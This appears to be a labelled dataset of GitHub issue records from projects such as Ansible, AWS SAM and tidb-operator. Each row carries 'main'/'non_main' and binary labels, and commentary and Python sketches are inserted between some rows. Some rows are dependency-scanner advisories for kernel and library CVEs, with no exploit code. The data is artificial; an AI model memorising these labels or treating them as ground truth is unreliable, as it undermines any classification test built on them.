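# Simulating an Arch Linux PATH lookup: only pacman resolves, so a portable
# installer should fall through to it instead of failing on apt-get.
assert pick_package_manager(which=lambda p: p == "pacman") == "pacman"
assert pick_package_manager(which=lambda p: None) is None
```

Injecting the lookup function keeps the probe testable without depending on the host's real PATH.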
Unnamed: 0: 1,203
id: 5,135,313,505
type: IssuesEvent
created_at: 2017-01-11 11:54:27
repo: ansible/ansible-modules-core
repo_url: https://api.github.com/repos/ansible/ansible-modules-core
action: closed
title: find module doesn't recognize symlinks correctly
labels: affects_2.0 bug_report waiting_on_maintainer
##### Issue Type: Bug Report ##### Ansible Version: 2.0.2 ##### Ansible Configuration: default configuration ##### Environment: debian jessie ##### Summary: When using the "find" module, symlinks are falsely identified as regular files. ##### Steps To Reproduce: How to reproduce: ``` mkdir /tmp/test touch /tmp/file ln -s /tmp/file /tmp/test/symlink ``` then run a playbook like this: ``` --- - hosts: localhost tasks: - find: paths="/tmp/test" register: find_result - debug: var=find_result ``` ##### Expected Results: ``` "files": [ { "islnk": true, "isreg": false, "path": "/tmp/test/symlink", } ] ``` ##### Actual Results: In the output, you will see ``` "files": [ { "islnk": false, "isreg": true, "path": "/tmp/test/symlink", } ] ``` When running `- find: paths="/tmp/test" file_type=file` to explicitly only match regular files, the result is the same (the symlink is in the results list). ##### Solution The reason for this is that [os.stat](https://docs.python.org/2/library/os.html#os.stat) is used to get the file info: https://github.com/ansible/ansible-modules-core/blob/devel/files/find.py#L316, and `os.stat` follows symlinks. Instead, [os.lstat](https://docs.python.org/2/library/os.html#os.lstat) should be used, which does not follow symlinks. It would also be possible to add an additional option `follow_symlinks=yes/no` to determine behaviour for this, but IMO, not following symlinks should be the default.
index: True
label: main
binary_label: 1
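The fix proposed in the record above — switching `os.stat` to `os.lstat` so symlinks are reported as links rather than as their targets — can be verified directly on a POSIX system. This sketch is illustrative; it is not the Ansible module code:

```python
import os
import stat
import tempfile

# Recreate the reporter's setup: a regular file and a symlink pointing at it.
tmp = tempfile.mkdtemp()
target = os.path.join(tmp, "file")
link = os.path.join(tmp, "symlink")
open(target, "w").close()
os.symlink(target, link)

# os.stat() follows the link, so `find` misreports it as a regular file...
assert stat.S_ISREG(os.stat(link).st_mode)
assert not stat.S_ISLNK(os.stat(link).st_mode)
# ...while os.lstat() reports on the link itself, as the issue expects.
assert stat.S_ISLNK(os.lstat(link).st_mode)
assert not stat.S_ISREG(os.lstat(link).st_mode)
```

On Python 3, `os.stat(link, follow_symlinks=False)` is equivalent to `os.lstat(link)`.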
Unnamed: 0: 93,245
id: 15,883,904,880
type: IssuesEvent
created_at: 2021-04-09 18:04:17
repo: fluorumlabs/flow
repo_url: https://api.github.com/repos/fluorumlabs/flow
action: opened
title: WS-2014-0034 (High) detected in commons-fileupload-1.3.3.jar
labels: security vulnerability
## WS-2014-0034 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>commons-fileupload-1.3.3.jar</b></p></summary> <p>The Apache Commons FileUpload component provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.</p> <p>Library home page: <a href="http://commons.apache.org/proper/commons-fileupload/">http://commons.apache.org/proper/commons-fileupload/</a></p> <p>Path to dependency file: flow/flow-component-demo-helpers/pom.xml</p> <p>Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,/home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,/home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,/home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,/home/wss-scanner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar,canner/.m2/repository/commons-fileupload/commons-fileupload/1.3.3/commons-fileupload-1.3.3.jar</p> <p> Dependency Hierarchy: - :x: **commons-fileupload-1.3.3.jar** (Vulnerable Library) <p>Found in HEAD commit: <a href="https://github.com/fluorumlabs/flow/commit/0ba54e0e818352f1db8ddc61f6153389759be39f">0ba54e0e818352f1db8ddc61f6153389759be39f</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> The class FileUploadBase in Apache Commons Fileupload before 1.4 has potential resource leak - InputStream not closed on exception. 
<p>Publish Date: 2014-02-17 <p>URL: <a href=https://commons.apache.org/proper/commons-fileupload/changes-report.html>WS-2014-0034</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: None - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814">https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814</a></p> <p>Release Date: 2019-09-26</p> <p>Fix Resolution: 1.4</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
index: True
label: non_main
binary_label: 0
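The vulnerability class in the record above is a stream left open when an exception is raised before `close()` runs. The actual Java fix is in the linked FileUpload commit; the failure mode itself is easy to reproduce in miniature with a Python stand-in (illustrative only, not the FileUpload code):

```python
class TrackedStream:
    """Stand-in for an input stream whose close() must be guaranteed."""
    def __init__(self):
        self.closed = False
    def read(self):
        raise IOError("simulated parse failure")
    def close(self):
        self.closed = True

def leaky_parse(stream):
    data = stream.read()   # raises before close() -> the stream leaks
    stream.close()
    return data

def safe_parse(stream):
    try:
        return stream.read()
    finally:
        stream.close()     # runs even when read() raises

s1 = TrackedStream()
try:
    leaky_parse(s1)
except IOError:
    pass
assert not s1.closed       # leaked, as in the reported resource-leak class

s2 = TrackedStream()
try:
    safe_parse(s2)
except IOError:
    pass
assert s2.closed           # closed despite the exception
```

The `try`/`finally` pattern here mirrors Java's try-with-resources, which the upstream fix amounts to.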
Unnamed: 0: 2,618
id: 8,877,301,500
type: IssuesEvent
created_at: 2019-01-12 23:10:14
repo: chocolatey/chocolatey-package-requests
repo_url: https://api.github.com/repos/chocolatey/chocolatey-package-requests
action: closed
title: RFP - DataStax DevCenter
labels: Blocked Upstream Status: Available For Maintainer(s)
Database queries are at the heart of every data-intensive application. Understanding your database schema, usage patterns, and bottlenecks is key to writing high performance applications. DataStax DevCenter is a multi-platform visual database tool that allows you to manage database schema, develop queries, and tune performance. **Website**: https://www.datastax.com/products/datastax-devcenter-and-development-tools#DataStax-DevCenter **Download**: Win-x86: https://portal.datastax.com/downloads.php?dsedownload=tar/devcenter/DevCenter-win-x86.zip Win-x64: https://portal.datastax.com/downloads.php?dsedownload=tar/devcenter/DevCenter-win-x86_64.zip **Previous versions**: https://academy.datastax.com/downloads/download-previous-versions#dl-devcenter Thanks
index: True
label: main
binary_label: 1
Unnamed: 0: 189,853
id: 22,047,138,981
type: IssuesEvent
created_at: 2022-05-30 03:58:42
repo: Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492
repo_url: https://api.github.com/repos/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492
action: closed
title: CVE-2021-42008 (High) detected in linuxlinux-4.19.88 - autoclosed
labels: security vulnerability
## CVE-2021-42008 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>linuxlinux-4.19.88</b></p></summary> <p> <p>The Linux Kernel</p> <p>Library home page: <a href=https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux>https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/?wsslib=linux</a></p> <p>Found in HEAD commit: <a href="https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492/commit/8d2169763c8858bce8d07fbb569f01ef9b30383b">8d2169763c8858bce8d07fbb569f01ef9b30383b</a></p> <p>Found in base branch: <b>master</b></p></p> </details> </p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Source Files (2)</summary> <p></p> <p> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/linux-4.19.72/drivers/net/hamradio/6pack.c</b> <img src='https://s3.amazonaws.com/wss-public/bitbucketImages/xRedImage.png' width=19 height=20> <b>/linux-4.19.72/drivers/net/hamradio/6pack.c</b> </p> </details> <p></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access. 
<p>Publish Date: 2021-10-05 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-42008>CVE-2021-42008</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.8</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: Low - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://www.linuxkernelcves.com/cves/CVE-2021-42008">https://www.linuxkernelcves.com/cves/CVE-2021-42008</a></p> <p>Release Date: 2021-10-05</p> <p>Fix Resolution: v4.4.282,v4.9.281,v4.14.245,v4.19.205,v5.4.143,v5.10.61,v5.13.13,v5.14-rc7</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
index: True
label: non_main
binary_label: 0
3,621
14,633,794,967
IssuesEvent
2020-12-24 03:09:16
ContinuousEngineeringProject/ce-cli
https://api.github.com/repos/ContinuousEngineeringProject/ce-cli
opened
check the health of a jenkins x installation
area/jenkins x kind/feature step/maintain the factory
### **This is a Feature Request** ### **What would you like to be added** <!-- Describe as precisely as possible how this feature/enhancement should work from the user perspective. What should be changed, etc. --> ### **Why is this needed** ### **Comments** <!-- Any additional related comments that might help. Drawings/mockups would be extremely helpful (if required). -->
True
check the health of a jenkins x installation - ### **This is a Feature Request** ### **What would you like to be added** <!-- Describe as precisely as possible how this feature/enhancement should work from the user perspective. What should be changed, etc. --> ### **Why is this needed** ### **Comments** <!-- Any additional related comments that might help. Drawings/mockups would be extremely helpful (if required). -->
main
check the health of a jenkins x installation this is a feature request what would you like to be added why is this needed comments
1
277
3,041,897,833
IssuesEvent
2015-08-08 02:58:37
Homebrew/homebrew
https://api.github.com/repos/Homebrew/homebrew
closed
formula 'ntopng': Page "/lua/login.lua" was not found
maintainer feedback user configuration
This is a sequel of this issue https://github.com/Homebrew/homebrew/issues/41637 (it was closed but seems like it wasn't addressed). Please help!
True
formula 'ntopng': Page "/lua/login.lua" was not found - This is a sequel of this issue https://github.com/Homebrew/homebrew/issues/41637 (it was closed but seems like it wasn't addressed). Please help!
main
formula ntopng page lua login lua was not found this is a sequel of this issue it was closed but seems like it wasn t addressed please help
1
109,839
9,416,200,610
IssuesEvent
2019-04-10 14:13:25
vanilla/vanilla
https://api.github.com/repos/vanilla/vanilla
closed
Rich Editor add tests & fix behaviour around splitting nesting lists
Domain: Frontend Tests Domain: Rich Editor Type: Bug
Integration tests & fixes should be added for the following rich editor list scenarios. ## Changing a root level list item with children. **Before** ``` - Item 1 - Item 1.1 - Item 1.2 ``` **Action** - Format Item 1 as a different kind list. - Format Item 1 as each other block format. ## Splitting a nested list. **Before** ``` - Item 1 - Item 1.1 - Item 1.2 1. Item 1.2.1 2. Item 1.2.2 - Item 1.3 ``` **Actions** - Format Item 1.2 as a different kind list. - Format Item 1.2 as each other block format.
1.0
Rich Editor add tests & fix behaviour around splitting nesting lists - Integration tests & fixes should be added for the following rich editor list scenarios. ## Changing a root level list item with children. **Before** ``` - Item 1 - Item 1.1 - Item 1.2 ``` **Action** - Format Item 1 as a different kind list. - Format Item 1 as each other block format. ## Splitting a nested list. **Before** ``` - Item 1 - Item 1.1 - Item 1.2 1. Item 1.2.1 2. Item 1.2.2 - Item 1.3 ``` **Actions** - Format Item 1.2 as a different kind list. - Format Item 1.2 as each other block format.
non_main
rich editor add tests fix behaviour around splitting nesting lists integration tests fixes should be added for the following rich editor list scenarios changing a root level list item with children before item item item action format item as a different kind list format item as each other block format splitting a nested list before item item item item item item actions format item as a different kind list format item as each other block format
0
5,658
29,179,639,511
IssuesEvent
2023-05-19 10:46:11
carbon-design-system/carbon
https://api.github.com/repos/carbon-design-system/carbon
reopened
[Feature Request]: Notification support for multiple errors/values
type: enhancement 💡 status: needs triage 🕵️‍♀️ status: waiting for maintainer response 💬
### The problem There is an occasional case where a user has multiple errors return. Current notifications do not support multiple values for errors, it only shows one "title" "subtitle" pair. Creating a bunch of separate notifications does not make for a good user experience. ### The solution Ideally I would like a navigator attached to the Notification component that allows for the user to flip through different errors. This will also require an additional (optional) prop or maybe a change to the current props that would allow for an array of title subtitle pairs instead of just one. Example implementations: <img width="624" alt="image" src="https://user-images.githubusercontent.com/45407808/230192349-e991aa3c-047d-4dbd-9476-ddd5cbfd37d0.png"> <img width="1149" alt="image" src="https://user-images.githubusercontent.com/45407808/230192906-228b771f-62dd-435c-a95b-6ec44cacd0f0.png"> Neither of these examples are the ideal design, but workarounds that have been used. I think the navigator arrows would ideally be placed to the left of the X, though that is open to discussion and what fits best with design standards. ### Examples _No response_ ### Application/PAL Security Verify ### Business priority None ### Available extra resources _No response_ ### Code of Conduct - [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/carbon/blob/f555616971a03fd454c0f4daea184adf41fff05b/.github/CODE_OF_CONDUCT.md)
True
[Feature Request]: Notification support for multiple errors/values - ### The problem There is an occasional case where a user has multiple errors return. Current notifications do not support multiple values for errors, it only shows one "title" "subtitle" pair. Creating a bunch of separate notifications does not make for a good user experience. ### The solution Ideally I would like a navigator attached to the Notification component that allows for the user to flip through different errors. This will also require an additional (optional) prop or maybe a change to the current props that would allow for an array of title subtitle pairs instead of just one. Example implementations: <img width="624" alt="image" src="https://user-images.githubusercontent.com/45407808/230192349-e991aa3c-047d-4dbd-9476-ddd5cbfd37d0.png"> <img width="1149" alt="image" src="https://user-images.githubusercontent.com/45407808/230192906-228b771f-62dd-435c-a95b-6ec44cacd0f0.png"> Neither of these examples are the ideal design, but workarounds that have been used. I think the navigator arrows would ideally be placed to the left of the X, though that is open to discussion and what fits best with design standards. ### Examples _No response_ ### Application/PAL Security Verify ### Business priority None ### Available extra resources _No response_ ### Code of Conduct - [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/carbon/blob/f555616971a03fd454c0f4daea184adf41fff05b/.github/CODE_OF_CONDUCT.md)
main
notification support for multiple errors values the problem there is an occasional case where a user has multiple errors return current notifications do not support multiple values for errors it only shows one title subtitle pair creating a bunch of separate notifications does not make for a good user experience the solution ideally i would like a navigator attached to the notification component that allows for the user to flip through different errors this will also require an additional optional prop or maybe a change to the current props that would allow for an array of title subtitle pairs instead of just one example implementations img width alt image src img width alt image src neither of these examples are the ideal design but workarounds that have been used i think the navigator arrows would ideally be placed to the left of the x though that is open to discussion and what fits best with design standards examples no response application pal security verify business priority none available extra resources no response code of conduct i agree to follow this project s
1
5,062
25,942,545,022
IssuesEvent
2022-12-16 20:01:17
aws/serverless-application-model
https://api.github.com/repos/aws/serverless-application-model
closed
Updating API resource policy using mappings
type/docs area/resource/api maintainer/need-followup
I recently ran into an issue where resource policy on my API was getting updated but was not effective. So essentially a new deployment was not being created by SAM. It's because SAM processes the template before any mapping substitutions and according to SAM nothing changed and it doesn't generate a deployment. However, cloud-formation does the substitutions and updates the API. So you see updated policy in the console but its not effective. **Steps to reproduce the issue:** ```yaml Resources: LambdaAPIDefinition: Type: 'AWS::Serverless::Api' Properties: StageName: {Ref: Stage} DefinitionBody: REPLACE_WITH_SWAGGER_DEFINITION Auth: DefaultAuthorizer: AWS_IAM ResourcePolicy: CustomStatements: - Effect: Allow Principal: AWS: { 'Fn::FindInMap': [Map1, Map2, ReadOnlyApiAccounts] } Action: "execute-api:Invoke" Resource: - {'Fn::Sub': 'arn:${AWS::Partition}:execute-api:${AWS::Region}:${AWS::AccountId}:*'} Mappings: Map1: Map2: ReadOnlyApiAccounts : ["1234567890"] AllApiAccounts: ["1234567890"] ``` When i change ReadOnlyApiAccounts, i expect SAM to generate an API Deployment for policy changes to take effect but it doesn't.
True
Updating API resource policy using mappings - I recently ran into an issue where resource policy on my API was getting updated but was not effective. So essentially a new deployment was not being created by SAM. It's because SAM processes the template before any mapping substitutions and according to SAM nothing changed and it doesn't generate a deployment. However, cloud-formation does the substitutions and updates the API. So you see updated policy in the console but its not effective. **Steps to reproduce the issue:** ```yaml Resources: LambdaAPIDefinition: Type: 'AWS::Serverless::Api' Properties: StageName: {Ref: Stage} DefinitionBody: REPLACE_WITH_SWAGGER_DEFINITION Auth: DefaultAuthorizer: AWS_IAM ResourcePolicy: CustomStatements: - Effect: Allow Principal: AWS: { 'Fn::FindInMap': [Map1, Map2, ReadOnlyApiAccounts] } Action: "execute-api:Invoke" Resource: - {'Fn::Sub': 'arn:${AWS::Partition}:execute-api:${AWS::Region}:${AWS::AccountId}:*'} Mappings: Map1: Map2: ReadOnlyApiAccounts : ["1234567890"] AllApiAccounts: ["1234567890"] ``` When i change ReadOnlyApiAccounts, i expect SAM to generate an API Deployment for policy changes to take effect but it doesn't.
main
updating api resource policy using mappings i recently ran into an issue where resource policy on my api was getting updated but was not effective so essentially a new deployment was not being created by sam it s because sam processes the template before any mapping substitutions and according to sam nothing changed and it doesn t generate a deployment however cloud formation does the substitutions and updates the api so you see updated policy in the console but its not effective steps to reproduce the issue yaml resources lambdaapidefinition type aws serverless api properties stagename ref stage definitionbody replace with swagger definition auth defaultauthorizer aws iam resourcepolicy customstatements effect allow principal aws fn findinmap action execute api invoke resource fn sub arn aws partition execute api aws region aws accountid mappings readonlyapiaccounts allapiaccounts when i change readonlyapiaccounts i expect sam to generate an api deployment for policy changes to take effect but it doesn t
1
3,918
17,576,116,556
IssuesEvent
2021-08-15 16:38:37
jesus2099/konami-command
https://api.github.com/repos/jesus2099/konami-command
closed
TAG_TOOLS might now be redundant?
invalid mb_SUPER-MIND-CONTROL-II-X-TURBO minor maintainability
It seems now tag pages contain links to my/other tags: https://musicbrainz.org/user/jesus2099/tag/(cu)cumbersome Check if other TAG_TOOLS features are also in MBS now.
True
TAG_TOOLS might now be redundant? - It seems now tag pages contain links to my/other tags: https://musicbrainz.org/user/jesus2099/tag/(cu)cumbersome Check if other TAG_TOOLS features are also in MBS now.
main
tag tools might now be redundant it seems now tag pages contain links to my other tags check if other tag tools features are also in mbs now
1
3,230
12,368,706,266
IssuesEvent
2020-05-18 14:13:29
Kashdeya/Tiny-Progressions
https://api.github.com/repos/Kashdeya/Tiny-Progressions
closed
Can't craft flint tools or weapon - just become stone items
Version not Maintainted cant duplicate
Crafting with flint of any tools or weapon results in a stone tool or weapon
True
Can't craft flint tools or weapon - just become stone items - Crafting with flint of any tools or weapon results in a stone tool or weapon
main
can t craft flint tools or weapon just become stone items crafting with flint of any tools or weapon results in a stone tool or weapon
1
181,820
30,747,030,488
IssuesEvent
2023-07-28 15:48:35
CDCgov/prime-reportstream
https://api.github.com/repos/CDCgov/prime-reportstream
opened
Content update: Release notes
design experience
## User story As a ReportStream prospective/current user, I want the website content to be up-to-date, accurate and timely so I can trust the information to inform my decisions in my relationship with ReportStream. ## Background & context After completing basic outlines for key pages and IDing the new site structure, we need to create the actual content that will go in the wireframes. This ticket captures the work of updating the content for the **Release notes**. ## Open questions N/A ## Working links - TK: Draft link ## Acceptance criteria - [ ] Drafted finalized and reviewed with content owner and/or SME - [ ] Final draft presented to designer for next steps - [ ] Capture questions that come up during the content and design work in the [Website redesign research plan](https://docs.google.com/document/d/1Hmxu_mTGvSJ0RnfS_SXoY84dBeAyUuy7KsCL08N0azg/edit#heading=h.sqsn2oxgx0ou)
1.0
Content update: Release notes - ## User story As a ReportStream prospective/current user, I want the website content to be up-to-date, accurate and timely so I can trust the information to inform my decisions in my relationship with ReportStream. ## Background & context After completing basic outlines for key pages and IDing the new site structure, we need to create the actual content that will go in the wireframes. This ticket captures the work of updating the content for the **Release notes**. ## Open questions N/A ## Working links - TK: Draft link ## Acceptance criteria - [ ] Drafted finalized and reviewed with content owner and/or SME - [ ] Final draft presented to designer for next steps - [ ] Capture questions that come up during the content and design work in the [Website redesign research plan](https://docs.google.com/document/d/1Hmxu_mTGvSJ0RnfS_SXoY84dBeAyUuy7KsCL08N0azg/edit#heading=h.sqsn2oxgx0ou)
non_main
content update release notes user story as a reportstream prospective current user i want the website content to be up to date accurate and timely so i can trust the information to inform my decisions in my relationship with reportstream background context after completing basic outlines for key pages and iding the new site structure we need to create the actual content that will go in the wireframes this ticket captures the work of updating the content for the release notes open questions n a working links tk draft link acceptance criteria drafted finalized and reviewed with content owner and or sme final draft presented to designer for next steps capture questions that come up during the content and design work in the
0
160,986
13,804,622,012
IssuesEvent
2020-10-11 09:53:27
ryanheise/audio_service
https://api.github.com/repos/ryanheise/audio_service
closed
How to check that the service has started/is running before attempting to communicate with it?
1 backlog Awaiting response documentation
### Question Is there a specific way of checking that the service is running, and that the BackgroundAudioTask constructor has finished execution; so that I can guarantee the ChangeNotifier will successfully retrieve the registered port? ### Context I am attempting to set up communication to the audio_service background task via Send and Receive Ports, using the IsolateNameServer to register and look up the port to use. If I start the service as soon as the app launches it will start, register the port and then the awaited Boolean result of starting the service will return and the main thread (in a ChangeNotifier) will successfully to look up and retrieve the registered port. However, this behaviour is not ideal as it means the notification is sitting empty as I'm not trying to play any audio (no media item set) as soon as the app loads. Alternatively if I wait until the first time I want to play some audio to start the service, then the service starts and successfully registers the port. But the ChangeNotifier that started the service cannot retrieve the port from the IsolateNameServer. I am guessing here, but I think this is due to the service either still being in the process of starting, or the BackgroundAudioTask not being fully initialized before attempting to fetch the registered port.
1.0
How to check that the service has started/is running before attempting to communicate with it? - ### Question Is there a specific way of checking that the service is running, and that the BackgroundAudioTask constructor has finished execution; so that I can guarantee the ChangeNotifier will successfully retrieve the registered port? ### Context I am attempting to set up communication to the audio_service background task via Send and Receive Ports, using the IsolateNameServer to register and look up the port to use. If I start the service as soon as the app launches it will start, register the port and then the awaited Boolean result of starting the service will return and the main thread (in a ChangeNotifier) will successfully to look up and retrieve the registered port. However, this behaviour is not ideal as it means the notification is sitting empty as I'm not trying to play any audio (no media item set) as soon as the app loads. Alternatively if I wait until the first time I want to play some audio to start the service, then the service starts and successfully registers the port. But the ChangeNotifier that started the service cannot retrieve the port from the IsolateNameServer. I am guessing here, but I think this is due to the service either still being in the process of starting, or the BackgroundAudioTask not being fully initialized before attempting to fetch the registered port.
non_main
how to check that the service has started is running before attempting to communicate with it question is there a specific way of checking that the service is running and that the backgroundaudiotask constructor has finished execution so that i can guarantee the changenotifier will successfully retrieve the registered port context i am attempting to set up communication to the audio service background task via send and receive ports using the isolatenameserver to register and look up the port to use if i start the service as soon as the app launches it will start register the port and then the awaited boolean result of starting the service will return and the main thread in a changenotifier will successfully to look up and retrieve the registered port however this behaviour is not ideal as it means the notification is sitting empty as i m not trying to play any audio no media item set as soon as the app loads alternatively if i wait until the first time i want to play some audio to start the service then the service starts and successfully registers the port but the changenotifier that started the service cannot retrieve the port from the isolatenameserver i am guessing here but i think this is due to the service either still being in the process of starting or the backgroundaudiotask not being fully initialized before attempting to fetch the registered port
0
197,026
15,618,719,705
IssuesEvent
2021-03-20 01:55:34
mossmann/hackrf
https://api.github.com/repos/mossmann/hackrf
closed
need technical specifications
documentation question
Missing specifications: - speed of panoramic analysis; - the number of monitored channels; - the minimum duration of the detected radio signal;
1.0
need technical specifications - Missing specifications: - speed of panoramic analysis; - the number of monitored channels; - the minimum duration of the detected radio signal;
non_main
need technical specifications missing specifications speed of panoramic analysis the number of monitored channels the minimum duration of the detected radio signal
0
186,127
14,394,638,319
IssuesEvent
2020-12-03 01:46:13
github-vet/rangeclosure-findings
https://api.github.com/repos/github-vet/rangeclosure-findings
closed
pingcap/tidb-operator: pkg/backup/backupschedule/backup_schedule_manager_test.go; 12 LoC
fresh small test
Found a possible issue in [pingcap/tidb-operator](https://www.github.com/pingcap/tidb-operator) at [pkg/backup/backupschedule/backup_schedule_manager_test.go](https://github.com/pingcap/tidb-operator/blob/57b7160e1586cf6f4bd0354fc8c4a7ee750a4f69/pkg/backup/backupschedule/backup_schedule_manager_test.go#L97-L108) Below is the message reported by the analyzer for this snippet of code. Beware that the analyzer only reports the first issue it finds, so please do not limit your consideration to the contents of the below message. > function call which takes a reference to bk at line 105 may start a goroutine [Click here to see the code in its original context.](https://github.com/pingcap/tidb-operator/blob/57b7160e1586cf6f4bd0354fc8c4a7ee750a4f69/pkg/backup/backupschedule/backup_schedule_manager_test.go#L97-L108) <details> <summary>Click here to show the 12 line(s) of Go which triggered the analyzer.</summary> ```go for _, bk := range bks.Items { changed := v1alpha1.UpdateBackupCondition(&bk.Status, &v1alpha1.BackupCondition{ Type: v1alpha1.BackupComplete, Status: v1.ConditionTrue, }) if changed { bk.CreationTimestamp = metav1.Time{Time: m.now()} t.Log("complete backup: ", bk.Name) helper.updateBackup(&bk) } g.Expect(err).Should(BeNil()) } ``` </details> Leave a reaction on this issue to contribute to the project by classifying this instance as a **Bug** :-1:, **Mitigated** :+1:, or **Desirable Behavior** :rocket: See the descriptions of the classifications [here](https://github.com/github-vet/rangeclosure-findings#how-can-i-help) for more information. commit ID: 57b7160e1586cf6f4bd0354fc8c4a7ee750a4f69
1.0
pingcap/tidb-operator: pkg/backup/backupschedule/backup_schedule_manager_test.go; 12 LoC - Found a possible issue in [pingcap/tidb-operator](https://www.github.com/pingcap/tidb-operator) at [pkg/backup/backupschedule/backup_schedule_manager_test.go](https://github.com/pingcap/tidb-operator/blob/57b7160e1586cf6f4bd0354fc8c4a7ee750a4f69/pkg/backup/backupschedule/backup_schedule_manager_test.go#L97-L108) Below is the message reported by the analyzer for this snippet of code. Beware that the analyzer only reports the first issue it finds, so please do not limit your consideration to the contents of the below message. > function call which takes a reference to bk at line 105 may start a goroutine [Click here to see the code in its original context.](https://github.com/pingcap/tidb-operator/blob/57b7160e1586cf6f4bd0354fc8c4a7ee750a4f69/pkg/backup/backupschedule/backup_schedule_manager_test.go#L97-L108) <details> <summary>Click here to show the 12 line(s) of Go which triggered the analyzer.</summary> ```go for _, bk := range bks.Items { changed := v1alpha1.UpdateBackupCondition(&bk.Status, &v1alpha1.BackupCondition{ Type: v1alpha1.BackupComplete, Status: v1.ConditionTrue, }) if changed { bk.CreationTimestamp = metav1.Time{Time: m.now()} t.Log("complete backup: ", bk.Name) helper.updateBackup(&bk) } g.Expect(err).Should(BeNil()) } ``` </details> Leave a reaction on this issue to contribute to the project by classifying this instance as a **Bug** :-1:, **Mitigated** :+1:, or **Desirable Behavior** :rocket: See the descriptions of the classifications [here](https://github.com/github-vet/rangeclosure-findings#how-can-i-help) for more information. commit ID: 57b7160e1586cf6f4bd0354fc8c4a7ee750a4f69
non_main
pingcap tidb operator pkg backup backupschedule backup schedule manager test go loc found a possible issue in at below is the message reported by the analyzer for this snippet of code beware that the analyzer only reports the first issue it finds so please do not limit your consideration to the contents of the below message function call which takes a reference to bk at line may start a goroutine click here to show the line s of go which triggered the analyzer go for bk range bks items changed updatebackupcondition bk status backupcondition type backupcomplete status conditiontrue if changed bk creationtimestamp time time m now t log complete backup bk name helper updatebackup bk g expect err should benil leave a reaction on this issue to contribute to the project by classifying this instance as a bug mitigated or desirable behavior rocket see the descriptions of the classifications for more information commit id
0
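The record above flags Go's classic range-loop aliasing: `&bk` is taken on a loop variable that (before Go 1.22) is reused across iterations, so a goroutine started with that pointer may observe a later item than intended. The same late-binding hazard, and the per-iteration-copy fix, can be sketched in Python — this is an illustrative analogy only, not code from the flagged repository, and all names here are hypothetical:

```python
def make_getters_buggy(items):
    """Closures capture the loop variable itself, not its value per iteration."""
    getters = []
    for item in items:
        getters.append(lambda: item)  # every closure sees the final value of `item`
    return getters

def make_getters_fixed(items):
    """Bind the current value explicitly, mirroring Go's `bk := bk` copy idiom."""
    getters = []
    for item in items:
        getters.append(lambda item=item: item)  # default argument freezes the value now
    return getters

buggy = [g() for g in make_getters_buggy(["a", "b", "c"])]
fixed = [g() for g in make_getters_fixed(["a", "b", "c"])]
print(buggy)  # ['c', 'c', 'c'] — all closures alias the same variable
print(fixed)  # ['a', 'b', 'c']
```

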